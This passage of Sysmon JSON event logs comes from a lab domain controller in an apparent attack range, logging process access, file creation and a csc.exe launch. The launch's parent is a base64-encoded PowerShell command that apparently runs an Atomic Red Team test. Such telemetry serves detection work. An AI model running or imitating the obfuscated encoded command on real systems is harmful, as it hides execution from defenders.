06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001030010800}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001030010800}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:16.119\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.dll\r\nCreationUtcTime: 2020-08-01 06:55:16.119","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:16.119","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.dll","CreationUtcTime":"2020-08-01 06:55:16.119","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.119\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:16.119","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.119","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline","CreationUtcTime":"2020-08-01 06:55:16.119","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.135\r\nProcessGuid: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nParentProcessId: 4780\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.135","ProcessGuid":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths 